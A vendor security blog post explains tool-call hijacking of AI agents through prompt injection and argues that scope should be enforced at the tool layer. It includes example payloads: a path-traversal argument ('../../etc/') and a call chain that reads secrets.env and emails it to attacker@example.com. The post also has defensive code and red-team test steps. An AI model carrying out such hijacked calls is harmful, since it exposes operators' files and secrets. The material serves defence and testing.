Tool-Call Hijacking: Griffin AI vs Mythos

A hijacked tool call is more consequential than a hijacked response. The defence requires the tool layer to police the model, not the other way around.

Nayan Dey
Senior Security Engineer
3 min read

Tool-call hijacking is the attack variant where prompt injection or model manipulation induces the model to invoke tools the operator did not intend. Unlike prompt injection that produces a bad response, tool-call hijacking produces bad actions in the world — files deleted, emails sent, money moved. The defence requires the tool layer to enforce scope rather than trusting the model to request only authorised actions. Architectural choices matter here more than at the model layer.

What hijacking attacks look like

Three patterns:

  • Scope-expansion attempts. The model is induced to call a tool that exists but is not authorised for the current session.
  • Argument manipulation. The model calls an authorised tool but with manipulated arguments that expand the effective access.
  • Cascading tool invocation. The model is induced to make a chain of tool calls that together produce unauthorised behaviour even if each individual call is authorised.

Each pattern requires a different defence.
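The three patterns can be made concrete as the raw tool-call payloads the model emits. The tool names and payload shape below are hypothetical, for illustration only:

```python
# 1. Scope expansion: the tool exists on the server but is outside
#    this session's authorised set.
scope_expansion = {"tool": "delete_file", "args": {"path": "/data/db"}}

# 2. Argument manipulation: an authorised tool, called with a hostile
#    argument that widens its effective access.
argument_manipulation = {
    "tool": "list_files",
    "args": {"directory": "../../etc/"},
}

# 3. Cascading invocation: each call is individually authorised, but
#    the chain reads a secret and then writes it to an external sink.
cascade = [
    {"tool": "read_file", "args": {"path": "secrets.env"}},
    {"tool": "send_email", "args": {"to": "attacker@example.com",
                                    "body": "<contents of secrets.env>"}},
]
```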

Where model-level defences fail

"Ask the model nicely to only call authorised tools" is the weakest defence: it depends on the model's judgment, which is exactly what the attack exploits. Mythos-class tools that rely primarily on model-level enforcement are measurably vulnerable to these patterns.

How Griffin AI handles it

Three architectural layers:

Authorisation at the tool layer. Each tool has scope, and the scope is enforced by the tool handler, not by the model. When the model emits a call to a tool outside the session's scope, the tool layer refuses regardless of how the model justified the call.
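In sketch form, this means the dispatcher treats the model's output as an untrusted request and checks it against the session's scope before any handler runs. The names here (SESSION_SCOPE, dispatch, ToolCallDenied) are illustrative, not Griffin AI's actual API:

```python
class ToolCallDenied(Exception):
    """Raised when the model requests a tool outside the session scope."""

# Stub handlers standing in for real tool implementations.
TOOLS = {
    "list_files": lambda directory: f"listing {directory}",
    "delete_file": lambda path: f"deleting {path}",
}

# Tools authorised for this session, fixed by the operator, not the model.
SESSION_SCOPE = {"list_files"}

def dispatch(tool_name, **kwargs):
    # The check lives in the tool layer: however the model justified the
    # call, an out-of-scope tool name is refused before any handler runs.
    if tool_name not in SESSION_SCOPE:
        raise ToolCallDenied(f"tool {tool_name!r} is out of scope")
    return TOOLS[tool_name](**kwargs)
```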

Argument validation against capability manifest. Each tool's capability manifest declares what arguments are acceptable. Argument values outside the declared range are rejected at the tool layer.
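A minimal sketch of such a manifest, assuming a hypothetical transfer_funds tool whose declaration bounds each argument; the manifest format and predicate style are illustrative:

```python
# Each tool declares a predicate per argument; anything outside the
# declared range, and any undeclared argument, is rejected.
MANIFEST = {
    "transfer_funds": {
        "amount": lambda v: isinstance(v, int) and 0 < v <= 1000,
        "account": lambda v: isinstance(v, str) and v.startswith("ACME-"),
    },
}

def validate_args(tool, args):
    spec = MANIFEST[tool]
    # Unknown or missing arguments are rejected, not silently ignored.
    if set(args) != set(spec):
        return False
    return all(check(args[name]) for name, check in spec.items())
```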

Cascading-invocation rate limits. Anomalous patterns of cascading tool calls (e.g., read followed immediately by exfiltrative write) trigger rate limits and optional out-of-band confirmation.
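One way to sketch this is a sliding-window monitor over recent calls: a burst of calls is rate-limited, and a read tool immediately followed by an outbound-write tool is flagged for confirmation. The tool sets, window size, and policy below are assumptions for illustration:

```python
import time
from collections import deque

READ_TOOLS = {"list_files", "read_file"}
WRITE_TOOLS = {"send_email", "http_post"}
WINDOW_SECS, MAX_CALLS = 10.0, 5

recent = deque()  # (timestamp, tool_name) of allowed calls

def check_call(tool, now=None):
    now = time.monotonic() if now is None else now
    # Drop calls that have aged out of the window.
    while recent and now - recent[0][0] > WINDOW_SECS:
        recent.popleft()
    if len(recent) >= MAX_CALLS:
        return "rate_limited"
    # Read immediately followed by an outbound write: the classic
    # exfiltration chain. Hold the call for out-of-band confirmation.
    if recent and recent[-1][1] in READ_TOOLS and tool in WRITE_TOOLS:
        return "needs_confirmation"
    recent.append((now, tool))
    return "allowed"
```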

A concrete example

An MCP server exposes a list_files(directory) tool scoped to a specific directory. An attacker's prompt injection induces the model to call list_files(directory="../../etc/").

With model-level defences: the model may or may not refuse, depending on its training.

With Griffin AI's tool-layer enforcement: the tool handler rejects the call because the directory argument escapes the declared scope. The attacker's attempt is logged; the audit trail shows the model attempted an out-of-scope call.
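The directory check can be sketched as follows: resolve the argument relative to the declared root and refuse any value that resolves outside it. ALLOWED_ROOT, in_scope, and list_files are illustrative names, not Griffin AI's actual API:

```python
from pathlib import Path

ALLOWED_ROOT = Path("/srv/agent-files").resolve()

def in_scope(directory: str) -> bool:
    # Resolve the argument against the declared root; "../../etc/"
    # resolves to /etc, which is outside the root and fails the check.
    # An absolute path like "/etc/passwd" also resolves outside it.
    target = (ALLOWED_ROOT / directory).resolve()
    return target == ALLOWED_ROOT or ALLOWED_ROOT in target.parents

def list_files(directory: str):
    # The handler refuses before touching the filesystem, so the
    # attempt can be logged as an out-of-scope call.
    if not in_scope(directory):
        raise PermissionError(f"{directory!r} escapes the declared scope")
    return sorted(p.name for p in (ALLOWED_ROOT / directory).iterdir())
```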

What to evaluate

Three concrete checks:

  1. Configure an MCP server with narrow scope. Induce the model to attempt a scope-escape. Verify the scope holds.
  2. Attempt argument manipulation (path traversal, SQL injection in tool arguments). Verify the arguments are validated at the tool layer.
  3. Attempt cascading tool invocation. Verify rate limits trigger.
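Check 1 can be sketched as a small harness: stand up a narrow-scope dispatcher, simulate the hijacked call, and assert the refusal. The dispatcher here is a stub; in practice, point the same assertions at your real MCP server:

```python
def make_dispatcher(scope):
    # Stub standing in for an MCP server with a fixed tool scope.
    def dispatch(tool, **args):
        if tool not in scope:
            return {"ok": False, "error": "out_of_scope"}
        return {"ok": True, "tool": tool}
    return dispatch

def test_scope_holds():
    dispatch = make_dispatcher(scope={"list_files"})
    # In-scope call succeeds.
    assert dispatch("list_files", directory="reports")["ok"]
    # Simulated hijack: the model is induced to call an unscoped tool.
    result = dispatch("delete_file", path="/data")
    assert not result["ok"] and result["error"] == "out_of_scope"

test_scope_holds()
```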

How Safeguard Helps

Safeguard's tool-call security is built on tool-layer enforcement of scope, argument validation, and cascading-call rate limits. The defence does not depend on the model cooperating. For organisations whose AI agents have access to real production tools, this architectural choice is the difference between a safe deployment and a latent incident.
